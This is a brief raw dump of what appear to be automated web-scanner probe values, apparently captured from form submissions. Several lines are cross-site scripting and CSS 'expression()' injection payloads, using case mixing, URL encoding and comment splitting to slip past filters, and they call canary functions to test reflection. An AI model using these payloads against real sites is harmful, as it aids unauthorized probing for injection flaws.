%31%3C%53%63%52%69%50%74%20%3E%53%64%4F%63%289866%29%3C%2F%73%43%72%69%70%54%3E
1
1\u003CScRiPt\SdOc(9355)\u003C/sCripT\u003E
1<ScRiPt>SdOc(9642)</sCripT>
?
1}body{acu:Expre/**/SSion(HcUW(9682))}
1
1
1eN38Y
HcUW(9133)
1AH8AG[!+!]
1}body{acu:Expre/**/SSion(SdOc(9007))}
1
1
1
1sCVy3
SdOc(9569)
1
1WSWGX[!+!]
1
1
1
1
1